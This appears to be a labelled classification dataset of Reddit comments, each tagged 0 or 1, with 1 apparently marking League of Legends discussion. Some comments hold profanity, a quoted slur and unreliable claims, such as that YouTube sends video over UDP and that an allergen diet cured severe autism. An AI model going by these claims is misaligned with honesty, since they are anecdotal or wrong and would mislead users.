0	This isn't even close to Jim Crow. The key difference here is that black people never chose to be black. They were being punished for something they couldn't change or even hide. Anti-smoker laws are far more justified. Firstly smokers chose to start smoking and even had to work at it to get through their first couple of packs. Then they continue to smoke. So they are being punished for a decision they continue to make. Secondly, second-hand smoke is almost as dangerous as first-hand smoke. So now their actively screwing over anyone who happens to be downwind when they smoke. I choose not to smoke and I'll be damned if some dumbass who does increases my chances for lung cancer. They don't even have to fucking quit! They have e cigs that are legal in doors and nobody will bitch about!   I'm sorry but smoking is a stupid pointless choice that people make and there is no reason non-smokers should have to waste their tax money to facilitate the stupid decisions of smokers.
1	I know Riot wants the skin to be something people will actually use, but they start working on it fairly early (pretty sure it's in production right now), so it's going to be a champion that they predict will have enduring popularity. This means they've seen a lot of use in solo queue and competitive during the spring/summer splits (Janna wasn't used much end of S2 but was extremely popular mid-season), probably with a good winrate and a kit that just works even if the numbers are tuned a bit too low at some point. In my opinion, the list of probable candidates is:   Caitlyn, Leona, Sona, Lux, Fizz, Renekton, Hecarim, Wukong, Fiddlesticks, Jax, Tristana, Nasus, Kayle, Malphite, Jayce, Elise, Khazix, Ryze, Diana, Vayne, TF. Give or take a few random champs.   They're probably going for variety, so top/jungle and support are less likely, and they seem to go with "good" champions. Fizz feels too aloof and Renekton, Hecarim, Fiddlesticks, Elise, and Khazix feel too evil. Beach Babe Leona is in production already, so she's probably out as well, and Diana has an unkown skin in the works that could possible be Victorious, though I'm inclined to believe lore-wise (implying a total victory over the Solari) that it's not. Malphite's pretty boring, and he and Nasus both seem ill-fitted thematically. Wukong's only mildly popular and more annoying than glorious.   That leaves Caitlyn, Sona, Lux, Jax, Jayce, Tristana, Kayle, Ryze, Vayne, and TF. None of the AD carries seem a great fit, but it'll be Vayne if it's one of them because she actually fights darkness. I know Silver Bolts is considered kind of poor design, but it does give her the power to come back into relevance again and again. Jax and Jayce are both excellent candidates, and while I don't think Riot would pigeonhole themselves into J champs, both work extremely well thematically. Ryze has a billion skins already which shows that Riot's not averse to making more, but he's already Triumphant, so Victorious isn't likely. Of the rest (Lux, Kayle, and TF), TF seems a bit too much of a renegade, while Lux and Kayle are squeaky-clean and excellent candidates.
1	I'm after reading link's book Can some
0	Taken from:   >According to the Daily Mail, 39-year-old Adriana and 37-year-old Leandro both knew that they had been abandoned as infants in Brazil.   >The two also knew that their mothers had the same name, Maria.  These two facts alone seemed like just a coincidence and nothing more.   >When Adriana and Leandro met ten years ago for the first time, they quickly fell in love. A few years later they decided to marry and now have a seven year old daughter.   >In her search to find her mother Adriana contacted a radio station that had a program called ‘The Time Is Now’, which specialises in finding lost relatives.  The two were reunited on-air, but then her mother revealed that she has a brother.   >Translation of part of the Radio Globo interview:   >“Mother, you had other children besides me?” He said. “Yes,  had the ‘Leandro,’ but it was with another man, was not his father,” Mariasaid. Upon hearing the story of her mother, Adriana got desperate and started to cry compulsively. “I do not believe you’re telling me this. Leandro is my husband,” she said.   >After the interview Adriana said, “Only death is going to separate us. All this happened because God wanted it to happen. Of course it would have been different if we had known all this before, but we didn’t and we fell in love.”   >They said that they don’t blame their mother for abandoning them, and they plan to meet her in person soon.
1	It's not against the rules if you are logging into your OWN smurf account. If you login into your friends account and  play that is called "ELO-Boosting" and It's against the rules.
0	I subscribe that this idea is outdated and ill informed.  One Christmas tree out of a season of burning won't do a damn thing, not one.   The only people I have known to have chimney fires are those that never cleaned their chimney.  Besides, you would have to burn a lot of Christmas trees to have any appreciable creosote buildup.  If your only source of wood is only Christmas trees and you burned it for a season, then an outside maybe for a chimney fire.   However, if you clean your chimney every year like you're supposed to, i can't imagine any issues.  Additionally, your risk is further substantially reduced if you are not burning the needles and generally a moron.
1	I like to stay out of the cluster fuckage (I lose track of my character ffff) but still want be useful and do damage. I play rather defensively but have found myself thoroughly enjoying faster-paced champs and have been working towards being more ballsy.   I've never tried a melee character (been playing for 2 weeks). I am currently trying Ashe and enjoy her FUCKYOU arrow. I find characters that are slower paced boring (slow movement, slow attacks, long CDs..)   I have already tried: Morgana, Kayle, Twisted Fate (briefly), and Tristana. I have my eye on Annie, Orianna, Vayne, Amumu (try something new), Lux, Akali, Anivia, and Fiddlesticks.
0	There was a thread about a month or two ago in AskReddit where people were giving tips on how to be more attractive with minimal work. One of the tips was to smile more.   I had a crush on a girl I always saw in my college cafeteria. I never wanted to talk to her, because as beautiful as she was, and as nice as our mutual friends said she is, I just couldn't bring myself to talk to her in an environment where the only thing you can really talk about when you don't know someone very well is how shitty the food is. That's another tip I think I could give out: Don't be negative/cynical.   Well anyways, she added me on Facebook the other night, despite never having talked to me. I asked her how she knew who I was, and she said that a few of my friends would talk about me when she was around, and that she had noticed my smile.
0	One of the fire departments I worked for had coverage area that included Interstate 5(Which runs on the west coast from Canada to Mexico) and was a source of constant accidents.   Anytime there was an accident, we would have to hop on the freeway to get to the scene. It never failed that some idiot felt too important or too special to wait in line like everyone else and would jump into the emergency lane to pass people.   It was more often than not a BMW, but that is a different matter.   So here we come down the freeway code 3, in the emergency lane when we come up to some idiot that decided to use the emergency lane; and some trucker takes objection and rolls into the lane to keep the bmw from getting past him. Now we are blocked and cannot get to the accident.   I get on the PA system and let the bmw know that he needs to get out of the emergency lane. I lay on the airhorn to make my point. Mr bmw gets flustered and decides to roll up into the grass to the side of the breakdown lane.   He instantly gets stuck in the mud.   The highway patrol was behind us and pulled over to give him a citation...
1	I never been at elo hell but I think to get better, you should try to excel at one strong champion and learn the game mechanics better with that one character, so learn how to CS and ward and properly poke to just get better in the game. Like my main now is Annie and I do not lose my lane very often against most match ups. I even had an alt account and got to gold rating by just playing Annie and if the team would not give me mid I'll just support and I ended up 22/11 for my rank games.   I tell this to all my friends because I think by learning only one character really well, you start knowing all you can learn from your character and you can start learning more about the game. The thing about learning how to play your champions and then learning the game mechanics at the same time is making people learn less quickly about the game and essentially not becoming better.
0	Natural selection only works for traits that cause death (or create an unfavorable mate) before an organism is able to reproduce. Many diseases take longer than that to kill. Huntington’s is a good example of that. Also the diseases that express themselves early are recessive, genes that could be removed from the pool. I see eugenics as more of a preventive measure, which might be where your disagreement arises. We already have the technology to screen embryos, eggs and sperm in vitro. We can isolate harmful genes and remove/replace them so that the kid won’t have the pain and suffering that goes along with those diseases. I have to disagree with your assertion that we "would be claiming control over... to truly understand." I don’t know what papers you have been reading but many of the genes for hereditary diseases have been isolated and are regularly tested for. Mendelian genetics have been around for a hundred years, we know a great amount. I guess that I can see where you are coming from opinion wise but I disagree with some of your assumptions.
0	We've heard it a million times before and he's saying it as if he's some revolutionary new breed of man who'll be ridiculed by society for his controversial opinion.   Nothing wrong with liking small boobs, but he's basically saying big boobs are gross. Which is offensive to people with big boobs.
0	INTENTS AND PURPOSES.   AND DON'T GIVE ME ANY OF THAT "the meaning has changed" BULLSHIT. THAT SHIT IS THE REASON WHY WE HAVE 14 YEAR OLDS ON TWITTER  LITERALLY  DYING EVERY 2 DAYS 'CAUSE BECKY WORE FLIP FLOPS DURING THE OFF SEASON.
0	This is probably not as bad as me. I was in Paris once for a 15 hour layover and decided to visit Versailles for a few hours. When I tried to take the Metro back to the airport, they had some kind of hour long delay. I had only given myself an hour leeway, so I was going to miss my flight back to New York if I didn't get to the airport in time. So I decided to go outside and fetch a taxi. After about a dozen or so taxis (both empty and full) ignored me, I remembered that I had Uber on my phone. But Uber requires that you turn on data roaming. I didn't want to miss my flight so I decided to eat the few dollars of data roaming that Uber would cause. I also downloaded all my emails with the airport wifi beforehand, so I didn't think it was going to be so bad. Once I turned on the data roaming I realized that I made a huge mistake. Someone had been texting me dozens of pictures at 1-3 mb each via iMessage while I was at Versailles. Once I turned on the data, it grabbed about 50mb worth of pictures. You might think that that's nothing. But data roaming fees are: $.0195/KB ($19.96/MB). The Metro also started moving again a minute after I turned on data roaming.
1	My motivation? I love this game. The plays, the shameful fails, the laughs and giggles when something unexpected happens, I feel so immersed in the game when I play it, a rare experience for me.   With most games, they don't capture my attention, I can pause them (if they're pause-able) or just step away from them so easily, I have time to answer text messages and little things like that. But this game, it captures my emotion, once I start a game, I can't look away, I often forget that I received a text message or ignored a phone call while playing.... the game captures me.   Also I play a lot of dominion, I like the game mode better and the community that plays dominion is much smaller. I often run into the same players over and over again like how I see high elo streamers running into Fabyyy, SilSol, Arthelon, and other soloque stars. I really enjoy when I enter into a game with someone I have played with or against before. Playing games with these guys, after they've played with and against me in so many games, its really enjoyable and I hope that I'll some day be among the dominion stars.
1	Who gives a shit about any of this. Someone makes a post about pro players being assholes. They are, they all are. Who cares. Someone makes a post about how pro players are humans too so we shouldn't grab the pitchforks whenever they do something stupid. Who the fuck cares. This stupid idolization of "celebrities" is why "celebrities" can get away with the dumbest shit. Let them do what they want, those who are assholes will continue to be assholes, all you're doing by posting anything related to their shitty personalities ( this goes for both of these posts regarding pro players and their inflated egos ).   There are plenty of reasons why some people dislike certain players and others don't. A lot of people hate Phantoml0rd. Others think hes awesome. It's just different styles for different tastes.
0	Nah. My good friend thought my sister was cute, and asked me if I would mind if he made a move on her. He is a good guy, who I knew wouldn't manipulate or abuse her, and since they were both consenting adults I said go for it.   I wouldn't be friends with him if I didn't trust him, though walking in on her slobbing his knob at a house party isn't something I ever want to repeat.
1	From what i've seen, Rengar is still pretty damn strong, he's still able to do his job quite well of assassinating targets even with the changes.   One guy whinged about Rengar being bad after he lost lane saying he sucks due to changes, this happened because he mis played not cause Rengar sucks now.   Another guy i saw also lost lane early, but he was able to come back into the game and was able to pretty much 3v1,   Comments about the R range being to big, think about his bone tooth passive, he gets a boat load of move speed when he reaches a certain amount of trophies, his R by default still gives him 25-45% move speed, the 1000 range ain't hard to gap close.
0	When talking about non-minimum wage jobs this is irrelevant because competition for skilled work, competition over employees qualified drives wages up to their market value generally speaking. This means they are more or less paid close to the highest amount of their worth to a company for the work they do. This is in line with what you are saying you want.     When you talk about minimum wage jobs this is different. These are jobs where little to no skill is required, so therefore there is no driving factor of competition to increase wages. Its not that the economy would be better off with paying them more, its that the economy would be better off without the minimum wage jobs and that people would be trained in a skilled labour. Hard to accomplish but since you are talking theoretical and idealistic I am responding in the same. Yes paying employees more money just moves the money off the investor who would also spend it, its not like your straight up adding that money into the economy.       The reason that the investor makes the highest share of the profit of a company is because it is what drives them to make or invest in a business, without that motivation most companies and their products would not have been created. This aspect of capitalism drives more companies and products with lower costs and higher quality to exist. If there are people out there that don't meet any skills to get a skilled job then that is not the fault of the investors and inventors of the world. If you told fast food companies you needed to pay them each $60k a year 1 of 2 things would happen. A. The cost to buy a Big Mac would go up 10x or B. The company would not make enough margin and just close instead.
1	Blakinola has said he's going to do a series of
1	As you said earlier, regardless of what date system you use, by the time your brain realizes it's reading a date it's already dissected the information into a usable form.   Since we're being technical about the minds subconscious digesting of date formats, when it reads the first digit D gives us, since 0AD to the end of 2014, 24,180 occurrences for D=1-28, ~500 for for 22,659 for D=29, and 22,165 for D=30, and 14,105 for D=31. Y first immediately drops it to 365. I don't know about you, but if I had to actively sift through a subset of ~735,964 day plot points I'd want to get down to 365 after a single piece of information than search through multiple tables of 14k+ subsets.
1	It was a lose-lose situation when I got caught by Froggen's Q.   If I zhonya/ultimate out, they get inhibitor, cause I was 50% of the damage into kogmaw (he had GA up aswell). If I live from that without using zhonya/ultimate, we woulda been able to fight them after turret, making us be able to make dem Comebacks!
1	What is your Elo?   1947 on one account and 1920 on another   > How did you play to get to 1900? Did you play a single champion over and over again, like Dyrus and Hotshot, or did you play a few champions, or did you play whatever you felt like? If so, which champion was it? Did you just play a single role, but a variety of champions in that role? If so, which role did you play, and which champions were your best?   I, like you, am a Jack of all trades player. I play everything and tell my teammates to pick their best and fill me in if i'm a later pick; and only pick solos if I can pick something very safe. I do generally pick heros that I know don't have hard counters but some are exceptions.   Champions:   Janna   Lee Sin   Corki   Morgana   Ryze   Kennen   Riven   Cassiopeia   > How many games did it take you to get from 1500 to 1900? 100? 200? 500? How many more to get to where you are right now? (Or where you feel is where you should be, I know that high elo is very volatile)   I didn't jump straight into ranked, I played normals until I had about ~400 wins. I jumped straight to 1400s when I first started, increasing about 100 every 2 weeks until I hit the 1700s. I was in the 1700s range for about 1-2 months and the 1800s for about 3 weeks. I think I could have done it faster but solo queueing at the 1700-1800 range is miserable, troll filled, and generally frustrating. I've played about ~1000 games across the two accounts.   I am pretty satisfied for where I am in terms of elo, I'd like to hit 2000 but I don't really play enough solo queue on my own (prefer to duo queue with friends that are lower elo/on different accounts as playing by yourself gets old)   > What role do you think is the best for getting better at the game. For example, support might be the hardest role to carry with, but could the focus from last hitting on the rest of the game help you learn it faster?   Support is  vastly  underrated in terms of gaining elo. I kind of disagree with the circlejerk when it comes to this for a few reasons. I'd say it's the best for improving generally at the game's awareness/teamplay components. I'd say jungling is a close 2nd.     There are A LOT less support mains at low elo. Usually players are forced into it and are generally unpleasant in their gameplay and their demeanor.     Supports hardly ever get banned out unless for their jungling aspects, besides that few week stint of Janna bans it's a relatively safe position.     You can easily make calls as a support player, and the ability to pay attention to the map and know where to ward helps your general awareness with other roles as well.     Bot lane gaining an advantage, if it's significant enough, can win the entire game from lane phase. AD carries getting items too early just spells disaster for the other team as their bruisers will start to fall off earlier than your teams'.       For mechanics I'd say that midlane actually teaches you the most as it's the most "skilled" (imo) position as it's all about landing combos, roaming properly, and utilizing your champion's kit during the midgame.
0	Having a profit motive does not mean that the best strategy for a company is to treat its customers badly. Looking at the company-customer relationship as necessarily adversarial is a very zero-sum way of looking at it. Sure, EA charging too much for underdeveloped games and using mandatory online game-play to prevent copyright theft seem like the logical result of EA maximizing the profit motive, but this has a deleterious effect on their relationship with its customers. The bad publicity and people's negative experience might end up hurting the company in the long run. Contrast that with other companies such as Steam or [insert your personal favorite here]. Many of these companies actively work to give their customers a good experience and be fair to them. This might cause them to incur additional costs such as longer development times, more money spent on refunds/replacements and such, but it builds a positive relationship between the company and the customer. In the long run, this increases sales as customers keep buying from the developer because they have a certain amount of trust in them. Criticism of EA is not only perfectly valid, but necessary to encourage companies to treat customers better.
0	Don't know what else to tell you. It turned to long distance relationship after like half a year or a year I'm not sure anymore (her parents moved to another country). So that was pretty lame. Constant jealousy and mistrust to the point that I didn't go out anymore. Some kind of weird games trying to make me jealous too. I remember how miserable it felt this one time where I went out, and people were so happy to hang out with me again, she calls and hears some music in a cafe or bar (people don't check IDs where we lived) and thinks I'm in a club cheating on her and gets all pissed off.   I had options, which is the most annoying thing about it. I could have cheated on her if I wanted to, but I didn't. Instead I went ahead with long distance after such a short time at such an age when everyone around me told me she was a bit of a bitch. I guess I didn't want to break up with her just because she's leaving and felt it was a douchy thing to do. Eventually we broke up because we both got tired, but we were still talking rarely. A month later she starts talking to me about her new boyfriend, and how they started dating after having sex in his car. Was so uncomfortable to hear, but I end ask her how long they've been together and she says two months. Put two and two together and realize she kept me for that last month just to make sure her new relationship will prosper. Deleted her off MSN and started listening to bands like "Hatebreed" or whatever else helped me get my aggression out for about half a year.   I haven't dated anyone since then and am not exactly burning with the desire to do so either (I'm 23 now).   After all this shit my friends sung an altered version of "Scotty doesn't know" Which was pretty funny
1	Well, leaverbuster does its work and bans people who leaves a lot in games so after all you don't need to report anyone for afk. Leaverbuster detects it.   &nbsp;   Now, from my point of view, I have always said that if your pc can't handle the game you shouldn't be playing. You're being selfish if you do so, only caring about your fun even knowing that you could end crashing or dcing and therefore making your team lose.   &nbsp;   My philosophy is that if someone disconnects, I report him. If it only happened for a game then he won't be banned anyways. And if he really has a shitty computer that can't play the game then you are helping the system to make him stop ruining anyone else game.   &nbsp;
0	To be fair, Legend of Korra was originally only ever going to be 12 episodes, so they worked on a story that could get resolved in 12 episodes. And then when they were putting it together, Nickelodeon went "Yeah, we'd like to order more episodes." So they starte work on Book 2, and while Book 1 was airing, Nick ordered two more books.
1	The "Pick Order > Call Order" rule is only in place if players reach an impasse.   This is an excellent point and I wish more people would realize this simple concept. It's simply a last resort for when the team has failed to reach an agreement.   I used your quote as the
1	I don't care about the meta but if you want an immobile skillshot midlane mage vel is an awesome choice. I feel like his passive really shines in the support role however as it makes him a non-item dependant mage. Even with only frost queen's claim and support items he will become a damage threat with his true damage passive. Late game throw in a Liandry's Torment to counter health stacking which counters true damage and no matter what you'll be doing tons of damage. He has good synergy with champions like MF when he supports not only because of the wombo combo ults but because of the amazing harrass he provides to supplement MF's lane bully nature.
0	I only clicked this because of the claw and then when I tried to manually type the sub reddit I forgot the l in mildly so I ended up spelling midly and ended up in a interesting meta reddit
0	OK, I'll define 'Good' for you; Rescuing three fellow human beings and a child from a decade+ of captivity, rape and fear of death ..when others refused to get involved.   We cannot truly comprehend what he did for those women, out of an inherent instinct to HELP. When it kicked in, he reacted.   THAT alone makes him a good person.   Everyone deserves a chance at redemption; including this man.
1	I tried to dodge a queue once (double revive+surge duo queue with all caps names on a weekend, and an AFK? That's pushing it), but a teammate had already dodged. When I relogged I was instantly put in queue.   I tried to force a dodge once by randoming Teemo (our first pick banned the niche champion I wanted to play then said "fuck you faggot"), but decided to play it out.   Other than those two instances, nope. I sent a ticket to support to inquire into the nature of the ban, I got a copy / pasted reply. When I replied to the email to present a clear and logical explanation that identified a potential flaw in their system (situated just below 1850 elo in ranked at the time, the pressure to get into plat elo was forcing an extraordinary amount of dodges), I was met with the same copy / pasted reply I received for the initial email.   Seems they only want to publicly make examples out of the really bad cases, to get the community on their side. This is historically the case, especially with Pendragon, who will let a thousand Tribunal cases flow under the bridge until one that comes along where the guy is some depraved maniac you fear running into on the Fields of Justice.   > Riot's dedication to building a strong community never fails.   By all means there are phenomenal employees in Riot's arsenal; the statuskwoh guy posting in this thread is great. That's not to say that everything they do is the right thing to do, which is what frustrates me when people get the pro-Riot circlejerk going. It's shameful to see poorly implemented systems get lauded by the community, with any dissent getting downvoted (whether on Reddit or the General Discussion forums).   C'est la vie.
1	Riot doesn't have jurisdiction over Twitter, players,  like in any normal sport, always have rivalries and shit talk eachother.
1	Why does everyone think it's the junglers blue? It's not! It's the TEAMS blue, and you should decide as a TEAM who gets it. Yes, usually this is the mid laner considering he/she is mostly the one who needs the mana regen/cdr.   I would report this garen 100%, even if he said he needed it, I think everyone can agree that garen does not need blue buff and one of his teammates (either mid/top/adc or support) could use it way better. Therefore the Garen actively wastes resources/damage of his team, thereby assisting the enemy team, which is a punishable offense.
0	You get used to the hairyness eventually, then you just get the odd phantom tickle just like everyone else.   The real bain about hairy legs is that they usually lead to hairy arsehole. Hairy arsehole is a motherfuckinbitch.   I've gotten through entire toilet rolls after a particularly clay-like passing. And it never fails to earn a comment whenever I'm caught in the compromising position of having my shirt rise up my back. Shaving is completely necessary whilst simultaneously absolutely ridiculous. It's not just the act of contorting yourself in-front of a mirror, its the ever-present awareness of the consequences of being walked-in on. Even if you live alone/have locked the doors/are in a steel bunker under ground on the moon. Every peripheral noise is someone about to turn the door handle.   And god-forbid you use the front facing camera on your phone as a mirror.. because you know you're going to be checking and double checking all night that you deleted that video (even though you didn't hit record) in case somehow someone gets to browse your gallery of personal bum-pampering-time vids.
1	Here's my guess:   Your champion has a flag. Let's call it "invulnerable". When you use hourglass, that flag is set to true. When hourglass ends, the flag is set to false.   So, when you use hourglass, the flag was true. The game ended right around that time, so the flag would have also been set to true. When hourglass wore off, the flag was set to false and you were no longer invulnerable.
0	Having done both construction and harvest work in hot summers, as well as being in my fourth year of college I prefer the labor, which included plenty of overtime.  In college it feels so pointless and like I am not learning too many skills for a hefty price tag.  My classes are scattered throughout the day and the schedule is very irregular.  I come home to do my homework and study when I have to, which believe it or not is actually pretty mentally demanding.  I work  20-25 hours a week as well on campus which is a nice lax job, but takes a lot of time away from other things.  Keep in mind many students walk to campus, which is 30 minutes for me each way.  I don't know about other colleges, but mine is known as, "the hill" for a damn good reason.  Having chronic deep compartment syndrome, that walk FUCKING SUCKS.  Not to mention some of us have families, all have bills, participate in multiple groups basically because we have to, we do our laundry, some of us cook our own/family meals.  I really have no idea what responsibilities you are talking about, but I guaruntee there are plenty of college students working harder than you with more responsibilities.  I even know of a few student who work as full time managers which baffles the shit out of me.   In labor, I had a pretty regular schedule, made good money and felt like I had a purpose, felt no pressure whatsoever, to meet certain people or do anything beyond what I was told.   An average day of college is much more exhausting to me than a 60+ hour a week labor job in the 90-100 degree humid as fuck weather.
1	I know it will fix the current issue but only for LoL. The rest of my system will need to be tweaked to accommodate the change which I don't want to have to do. Then when I add my tthird monitor we will have a bunch more problems.  That's why I need to control the positioning manually. Wasn't trying to sound like a dick but his
1	The problem is that it  should  be the go to item for caster ADC's who don't necessarily want to AA that much, they just want raw AD to fuel their AD-scaling abilities. And ironically IE has more AD to fit that bill, while also being better for autoattackers thanks to crit scaling.
1	We don't need more items because  EVERYONE WILL ALWAYS GRAVITATE TOWARDS COOKIE CUTTER BUILDS   In CS 1.6, everyone buys only the same 3-4 items. Was the compact no good? Surely the bullpup has its strengths? Out of like 30ish weapons, people only used starting pistol/deagle/mp5/m4/ak/awp .   In WoW, cookie cutter PVP/PVE talent builds that are determined by math-geeks become the norm for everyone. Same with arena comps. Is it always the best? No.   Even in LoL, there was a time when everyone ran ghost/exhaust. Triple dorans into deathcap. Everyone rush cleaver, gp items into trinity, the list goes on and on.   Were there options for more variety? hell yeah. Are those options inferior? Not really. However, why would most people derail from what is generally agreed as the most solid path for the sake of uniqueness? Even if the perceived advantage is miniscule, people tend to stay with what is generally accepted as the best. With that being said, one may stand to argue that the "standard build paths" aren't even the optimal cookie cutter builds to begin with. The GP10 rush, aegis rush, mikael rush, no pot all ward/pots start were all existing options before it became popular. Most people simply aren't revolutionaries which is why we have r/lol.
0	Actually, the main reason that gifs take longer to load is that they are transported through the internet using a different protocol.  Youtube videos are sent using User Datagram Protocol (UDP), whereas a gif or any other image is sent using Transmission Control Protocol (TCP).  Without getting too technical, the basic difference is that TCP packets are designed to avoid network congestion, and all TCP packets must be received for the image to load properly.  UDP packets, on the other hand, completely ignore congestion issues and are sent one time only.  This results in a lot of packets being lost, but most of the time enough packets are received that your computer automatically fills in the gaps and creates an overall acceptable image.
0	Today, 80% of music is absolutely atrocious. It is computer enhanced garbage and many love it and there's nothing wrong with that because that's what they like. But that being said there is a solid 20% of modern music that is so stunningly amazing it can be life changing. It's not just one type of music it's in every genre across the board! For example I hate dub step/house music, but dammit there is some out there that is just remarkable and I respect.
1	If your ult is 100% going to save your mid and without it would guarantee a kill to an enemy why are you even asking this question? Of course use it, how do you know you can use your ult to get a kill top?   It's a morale thing too, you save your mid from certain death, gives a confidence boost to your team while denying that confidence boost to the enemy. You're making your global presence felt etc etc. And it's not like you only get one ult per game, the shit doesn't take long to cooldown.
1	Reddit a few weeks ago: Lucian is OP he dominates all the scene for AD Carries and he excels at literally everything   Riot: How about we nerf him then and make his range lower, that seems reasonable enough and to compensate we can make him even more ability based with lower cooldowns, more chase potential and lower mana costs   Reddit: OMG RITO RIP LUCIAN   Get a grip guys. You aint playing in the LCS, you can play any adc. If you truly enjoy the champion dont go being pissy because they got nerfed and just play your champion anyways. If there's people still playing Jayce, Zac, Cho etc. You can still play an ADC who's tentative nerfs could be way worse. This new cooldown and cooldown reduction for Lucian's dash might even make him actually have powerspikes rather than be good all the time, as he could end up having much more interesting combo's in lane that are much better early game. Sure, range nerfs are HUGE but they've given him decent stuff to compensate, from a trading standpoint he isnt that worse off and mid-late game he has the ability to reposition more frequently each fight making him hard to dive on as a bruiser. I understand Seraph's POV on this, but only as he plays at high elo. 90% of you guys are Bronze or Silver just like me, That's just common knowledge, and if you truly enjoy Lucian and main him like you say just fucking play him. The advantages at low elo from straight outplay far outweigh those from champion strength and none of you have even tried Lucian after these nerfs, why jump to conclusions?
1	i don't understand   ppl start saying   he  should make  PLAYS  hosw this  supposed to happen with  lucian  who brings  nothing to table after   30 min mark.
0	Just fuck you all. You are failing at "picking up girls" because that's how you see it. You aren't looking to make a bond with anybody, you're just hoping to release all that pent-up porn-fuelled sexual tension. When you realise that girls are people with tastes and distastes, and the fact that you are the type of guys that spend all day making sweeping generalisations and making excuses for yourself leaves very little to be desired about you. (Irony intended)   Getting bummed out because your wall-of-text confession of attraction backfired? Hating on that guy she's with in a picture on Facebook? Tip: Be that guy. Put yourself into social situations. Be seen. Be heard. Stop sitting quietly in the corner assessing and judging everybody.   Looks do not matter in the same sense that you aren't instantly attracted to the spotty fat girl. Of course looks matter, but if you spend all day drinking litres of coke and rubbing your greasy hands all over your face then your looks are going to suffer. As long as you present yourself well, you can look however you like; I've seen all manner of guys with hot girls, and  personality trumps looks. EVERY. DAMN. TIME.   I am absolutely sick to death of seeing Redditors make excuses for being a mid twenties virgin based on assumptions of the opposite sex being vacuous and unable to see your inner strenths? What inner strenghs? An unmatched skill in passive agressive quips?   It's the same with these memes: "Hey girls, if you like us, tell us!". Stop being a pussy. If you like her, tell her. Tip 2: To her face you fucking pussy.
1	It's also about cooldowns and mana use. Leblanc's full rotation outtrades everybody for the most part, but you can't reliably land Chains on a competent opponent, making QW her most likely source of burst. In order to pop Sigil, your W will take you into Kassadin's QE range at least, meaning leblanc will take the 160 base damage those skill deal, another 80 if Kass lands an empowered auto. You are risking 240 damage on your combo which deals ~200 damage plus any autos you land. Now take into account the mitigation from Kass's shield. You have to conclude that if you don't land Chains, Kassadin wins the trade on numbers alone.   Now bear in mind that Kassadin takes reduced Magic damage and starts with a shit ton of sustain. This means that one single won trade won't win Leblanc the lane. Now take into account that her level 3 combo costs roughly half of her mana pool, and has an 18 second cooldown. Kassadin quite simply shrugs off Leblanc in lane, doubly so if he can dodge Chains. For Leblanc, you can't realistically dodge Kassadin's QE damage if you are Distortion-ing in, and his mana sustain far exceeds hers.   If you put two points in W, the trade is even worse for Leblanc. Her only advantage is in ranged auto-attacking, where she ought to win out in the end. I encourage you to test the matchup out if you don't feel it favors Kassadin. The basic math is that Lebanc with two points in W deals 235+ dmg on her combo and puts herself into range for Kassadin's damage. Kassadin with two pts in Q and one in E deals 185+ and (if timed well), blocks 70 damage. Meaning he takes 165 damage and deals 185. This isn't even counting his flat 15% reduced magic damage, or the fact that he starts full sustain and won't have mana issues like Leblanc.
0	Theyre doing it to make themselves feel better because they sit back home, putting up yellow ribbons, spouting psudo patriotic jingoisms, knowing full well the wars for cheap gas for their jacked up trucks getting 8mpg wont cost them the lives of any of THEIR loved ones.
0	If he gives you a bad reference, sue him.   Most companies in America won't give any sort of reference because it opens them up to lawsuits.   When I managed for Chipotle, we were told to not even bother calling references and if anyone called us for one, I couldn't say anything.  I had to give a 1-800 number that would only tell callers the dates someone was employed with us.
1	He does have a point, though. CLG has kept fans and stayed under the spotlight despite back to back disappointments over recent years simply because of marketing themselves.   The CLG players are personalities, and people get attached to them, as opposed to let's say Vulcun/XDG who posted overall better results in their LCS tenure, but had far less fan interaction.   Even the original EG NA lineup owe their hype to the legacy players they got from the classic CLG.EU team, even if most of them were over the hill.
1	It's not even that I dislike either one of them. I even somewhat enjoy those
1	If you shut down anybody and stop their gold income they're useless. This is no different when it comes to Rengar. Yes he's strong, yes once you get a Trinity Force on him (just like Jax and Poppy) he gets Tanky. Get over it.
1	Solo and Duo Queue are just so much more common now it's easier to focus on tactics and sticking to the meta than it would be to coordinate a team-wide strategy for that game.   For example, say you wanted to have your jungler consistantly gank lane to take that tower early so you could coordinate a 15 minute baron. That strategy wouldn't fly if both your jungler and top laner weren't on the same page, or if your bottom lane decides to play aggressively and demand ganks/attention from your jungler.   It's a lot easier for people to stick to the basics like CSing, harassing, zoning, maybe even warding(!), than it would be for them to take the next logical step and work together for a common goal.
1	I think ADCs are in a good place now. They are not super broken, 2 shotting tanks, like they were at the start of pre-season 3 when I started this game.   They also still do the most end game damage overall and most certainly carry games if protected. My game that just got me into G2 was all about protecting our trist who was doing huge amounts of damage.
1	Don't listen to this guys, platinum is only toxic if you inflame the egos of your team. Everyone thinks they are good in this tier, because they ARE. if you maintain a professional attitude and treat your team mates like peers you will not experience the 'ego flame' of platinum tier. If you try to tell others what to do and type too much, yes, platinum can be hell because everyone has a strong opinion and a reason to think they are right (because everyone is good at this point). Platinum and the higher tiers have a LOT less players in them, everyone who is there is there for a reason at this point unlike other tiers where there's a lot more variables.
0	One thing that a lot of people forget is that autism is, as it exists today, just a group of symptoms. With no defined cause, what we call autism could be several different diseases or genetic abnormalities that all present in a similar way.  As a result, there probably isn't just a one size fits all solution.   I know that it isn't the solution for everyone (and it has been tried by several hundreds of desperate parents), but an allergen-free diet has worked wonders for my brother. He was diagnosed at age two with the worst case of autism that his tenured specialist had ever seen. After  bloodwork identified his allergies to the usual wheat and milk, his diet was adjusted and we saw some behavior improvement. Still serving for answers, my mother ordered more extensive allergy tests and found that he was also allergic to soy, rice, cow, chicken, pork, tomato, corn, and a whole list of other things that you don't even realize that you eat every day. We switched his diet to exclude all of his allergens- which,  by the way, is harder, more time consuming, and more stressful than just living with autism.  But, the results were there. He was social, happy, forming full sentences, having real conversations, showed dexterity and hand eye coordination, and most importantly, didn't spend the entire day rolled up in the fetal position with his comfort blanket under the coffee table. By sixth grade, my kid brother who had the worst case of autism the docs had seen, changed to a new school campaigned and was voted class president.  He is in band, plays three instruments, is in student council and science Olympiad, and has real friends. Yeah, he's a little quirky, but so is every other nerd I know. Most people don't understand why he can't just go to a restaurant and order food like everyone else.  He's tried going off the diet before- and within a couple of hours of eating half a bag of Fritos, he zones out and gets angry. Anyway- just wanted to share...
1	Couple of college friends wanted me to play. Tried it out decided I didn't like it. Then this girl I was dating at the time tried to get me to play with her. I said no for quite a while. Though I did try occasionally and still decided against it.   Over winter break she said she'd tech me the ins and outs of the game. I figured worst case it'd be a great way to bond. We played a lot together over that break.   Now, she rarely plays, and we rarely talk, but I've been hooked ever since then. Although now I play with my friends who originally asked me all the time!
